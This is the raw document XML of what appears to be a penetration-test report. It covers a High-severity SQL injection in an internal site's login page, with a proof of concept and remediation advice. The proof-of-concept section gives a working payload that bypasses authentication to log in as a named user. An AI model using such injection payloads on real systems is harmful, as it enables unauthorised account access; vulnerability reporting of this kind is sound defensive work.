                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="0967EB62" w14:textId="6D91D996">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="7E192044" w14:textId="322374FB">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="75DAE9D5">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection – http://internal.vese.com/ </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="75DAE9D5">
        <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>(High)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="538751DF" w14:textId="2D8D06D3">
      <w:pPr>
        <w:pStyle w:val="Finding"/>
      </w:pP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0947545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53253F1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Description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14FCFD6C" w:rsidP="57C4D39E" w:rsidRDefault="14FCFD6C" w14:paraId="598B4BA6" w14:textId="193F334A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14FCFD6C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">SQL </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="14FCFD6C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Injection</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="14FCFD6C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> in </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="14FCFD6C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Login</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="14FCFD6C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> Page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="0C9F2CA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243B80D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1246C7CF" w:rsidP="57C4D39E" w:rsidRDefault="1246C7CF" w14:paraId="706D016D" w14:textId="223C00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b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="1246C7CF">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="401F182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350A6C0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System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11D47AC7" w:rsidP="57C4D39E" w:rsidRDefault="11D47AC7" w14:paraId="78870582" w14:textId="1EA91794">
            <w:pPr>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11D47AC7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Ubuntu 22.04.1 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="31A701AD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="11D47AC7" w:rsidP="57C4D39E" w:rsidRDefault="11D47AC7" w14:paraId="2E92E04D" w14:textId="41E7B84A">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11D47AC7">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t xml:space="preserve">Location </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar/>
          </w:tcPr>
          <w:p w:rsidR="11D47AC7" w:rsidP="57C4D39E" w:rsidRDefault="11D47AC7" w14:paraId="2D021148" w14:textId="5C057FEF">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="11D47AC7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>http://internal.vese.com/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="6F447EFD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50C8BBC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References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002D4E01" w:rsidP="57C4D39E" w:rsidRDefault="002D4E01" w14:noSpellErr="1" w14:paraId="026D2644" w14:textId="754FB62C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="002D4E01">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>https://attack.mitre.org/techniques/T1190/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:noSpellErr="1" w14:paraId="79404529" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="BodyBlockLine"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="553933CD" w14:textId="6A02F9DC">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2F1A6C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2F1A6C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2F1A6C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Proof</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2F1A6C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2F1A6C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2F1A6C89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> Concept</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="52BFDEC0" w14:textId="265F7D88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0BE3DD6B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>The login application leaks database errors. This can give attackers an insight into what database is running on the server</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="67550883">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. To trigger a database </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="46BCE494">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>error, attackers can send a</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="72B9A6B8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> single quote in </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="72B9A6B8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">username </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="72B9A6B8">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">field: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="1364DDDD" w14:textId="1B4D94CB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1CF28B2C">
        <w:drawing>
          <wp:inline wp14:editId="1F2DDAB3" wp14:anchorId="2E720274">
            <wp:extent cx="4572000" cy="2552700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9820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0085461c6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438FB337" w14:textId="65E8E8C4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1CF28B2C">
        <w:rPr/>
        <w:t>Application responds with:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="22403933" w14:textId="6F0980DE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1CF28B2C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>Unable to prepare MySQL statement (check your syntax) - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '''')' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="49589508" w14:textId="1455FCFC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1CF28B2C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>Knowing what kind of database is running (MariaDB), a</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="3C52D6CA">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>ttackers</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1CF28B2C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> can prepare a special payload that will be injected into SQL query</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="6EB5CA11">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> that bypasses login authorization</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1CF28B2C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="6128A83D" w14:textId="61414202">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="76D1622C">
        <w:drawing>
          <wp:inline wp14:editId="5385C2DC" wp14:anchorId="19B8811E">
            <wp:extent cx="4572000" cy="2486025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1570245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9991f2f00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8660BAA" w14:textId="4C302E4A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="61688ABA">
        <w:drawing>
          <wp:inline wp14:editId="109B176F" wp14:anchorId="2A703162">
            <wp:extent cx="4572000" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="149756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1f301298b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8A3F93F" w14:textId="6E60E82F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="27784B01">
        <w:rPr/>
        <w:t>However, if a username is known, it is possible to log in as a specific user without providing the password</w:t>
      </w:r>
      <w:r w:rsidR="357D77BC">
        <w:rPr/>
        <w:t xml:space="preserve">. The following payload successfully logs in as user </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="626CDBB7">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>dstewart</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="27784B01">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="68E75445" w14:textId="58818F08">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="27784B01">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="27784B01">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="27784B01">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>= x') OR username='dstewart'#</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="0CA4D360" w14:textId="7D35D664">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="0234B356">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t>password = x</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="2D73ED94" w14:textId="58818F08">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="2AA479A6">
        <w:drawing>
          <wp:inline wp14:editId="0995A47B" wp14:anchorId="080A4222">
            <wp:extent cx="4572000" cy="2390775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1026162074" name="" title="Trwa wstawianie obrazu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7fe1ae08c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3C609128" w14:textId="51F064FC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="7E6BB966" w14:textId="2EBB972E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="395E6E8D">
        <w:drawing>
          <wp:inline wp14:editId="41175CBB" wp14:anchorId="5830EB97">
            <wp:extent cx="4572000" cy="1981200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1515335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96828d510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C97C63F" w14:textId="7C022829">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C73D00" w:rsidP="57C4D39E" w:rsidRDefault="00BD0B0F" w14:paraId="73DEF0F5" w14:textId="77777777">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="2F1A6C89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5E03CF3B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886EBEB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Who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AC15111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 xml:space="preserve">IT </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="66981DE8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CCBD75C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0007576" w14:textId="54553F8F">
            <w:pPr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0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="57C4D39E" w:rsidTr="57C4D39E" w14:paraId="7FB28221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DD27E50">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/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29BD631" w14:textId="78689EB0">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1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 1</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="6C06C4D2">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="65F95EAD">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="13DDA20C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">o not </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4C1BF0D9">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">deploy a database </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="2B6E6372">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">to production server </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4C1BF0D9">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">with debugging enabled. Remove calls to </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="7E77DB64">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>public function error($error)</w:t>
            </w:r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 xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4C1BF0D9">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">in </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="25F1228B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>~</w:t>
            </w:r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/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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vese</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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-projects-code/websites/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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DB.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="4C1BF0D9">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="6AB99E94" w14:textId="0077E30A">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="57C4D39E" w:rsidP="57C4D39E" w:rsidRDefault="57C4D39E" w14:paraId="5674C5A5" w14:textId="04A95619">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:keepNext w:val="1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 2</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57C4D39E">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="74A8C5E6">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> C</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="0AAB1D4F">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">hange </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="24F944B0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">unsafe and injectable SQL </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="24F944B0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">query </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="24F944B0">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>in</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="57636855">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r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~/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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vese</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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-projects-code/websites/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="117F4067">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="1"/>
                <w:iCs w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="6C1A9A0C">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>to prepared statements, which separates the user input from actual SQL</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="625CD3E3">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> code</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="1530DD24">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="57C4D39E" w:rsidR="5EAEC06B">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> An example of prepared query is shown below:</w:t>
            </w:r>
          </w:p>
